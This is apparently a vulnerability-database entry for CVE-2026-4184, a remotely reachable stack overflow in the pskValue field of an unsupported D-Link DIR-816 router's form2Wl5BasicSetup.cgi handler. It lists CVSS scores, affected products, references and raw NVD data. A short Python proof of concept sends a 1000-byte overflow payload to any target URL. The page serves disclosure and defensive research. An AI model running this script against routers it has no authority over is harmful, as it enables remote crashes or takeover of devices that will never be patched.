CVE-2026-4184

Description

A vulnerability was detected in D-Link DIR-816 1.10CNB05. Affected by this vulnerability is an unknown functionality of the file /goform/form2Wl5BasicSetup.cgi of the component goahead. Performing a manipulation of the argument pskValue results in stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit is now public and may be used. This vulnerability only affects products that are no longer supported by the maintainer.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dlink:dir-816_firmware:1.10cnb05:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dlink:dir-816:-:*:*:*:*:*:*:* - NOT VULNERABLE

D-Link DIR-816 1.10CNB05

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2026-4184 PoC - D-Link DIR-816 Buffer Overflow
# Target: /goform/form2Wl5BasicSetup.cgi
# Parameter: pskValue

def exploit_dlink_dir816(target_url):
    """
    Exploit for CVE-2026-4184 - Stack-based Buffer Overflow
    in D-Link DIR-816 router's form2Wl5BasicSetup.cgi
    """
    # Generate payload with excessive length to trigger overflow
    # Standard buffer size is typically 64-256 bytes
    overflow_length = 1000
    payload = 'A' * overflow_length
    
    # Target endpoint
    url = f"{target_url}/goform/form2Wl5BasicSetup.cgi"
    
    # POST data with malicious pskValue parameter
    data = {
        'pskValue': payload,
        'wlanBasicSettings': '1',
        'submit': 'Apply'
    }
    
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }
    
    try:
        print(f"[*] Sending exploit payload to {url}")
        print(f"[*] Payload length: {len(payload)}")
        
        response = requests.post(url, data=data, headers=headers, timeout=10)
        
        print(f"[+] Response status: {response.status_code}")
        print(f"[*] Exploit sent successfully")
        
        return True
        
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_ip>\n")
        print(f"Example: python {sys.argv[0]} http://192.168.0.1")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    exploit_dlink_dir816(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4184
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4184
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4184/
[4] VulDB https://vuldb.com/cve/CVE-2026-4184
[5] https://github.com/wudipjq/my_vuln/blob/main/D-Link7/vuln_88/88.md
[6] https://vuldb.com/?ctiid.351088
[7] https://vuldb.com/?id.351088
[8] https://vuldb.com/?submit.769832
[9] https://www.dlink.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4184", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:59.473", "lastModified": "2026-03-19T19:20:44.813", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in D-Link DIR-816 1.10CNB05. Affected by this vulnerability is an unknown functionality of the file /goform/form2Wl5BasicSetup.cgi of the component goahead. Performing a manipulation of the argument pskValue results in stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit is now public and may be used. This vulnerability only affects products that are no longer supported by the maintainer."}, {"lang": "es", "value": "Una vulnerabilidad fue detectada en D-Link DIR-816 1.10CNB05. Afectada por esta vulnerabilidad es una funcionalidad desconocida del archivo /goform/form2Wl5BasicSetup.cgi del componente goahead. Realizar una manipulación del argumento pskValue resulta en desbordamiento de búfer basado en pila. El ataque es posible de ser llevado a cabo remotamente. El exploit es ahora público y puede ser usado. Esta vulnerabilidad solo afecta productos que ya no son soportados por el mantenedor."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.9, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "baseScore": 10.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-121"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dir-816_firmware:1.10cnb05:*:*:*:*:*:*:*", "matchCriteriaId": "6A221E99-E2B0-4C57-9263-9A86EFF8746E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dir-816:-:*:*:*:*:*:*:*", "matchCriteriaId": "B54058C1-B58F-434A-ABF0-A6B314A1AB14"}]}]}], "references": [{"url": "https://github.com/wudipjq/my_vuln/blob/main/D-Link7/vuln_88/88.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.351088", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.351088", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https: ... (truncated)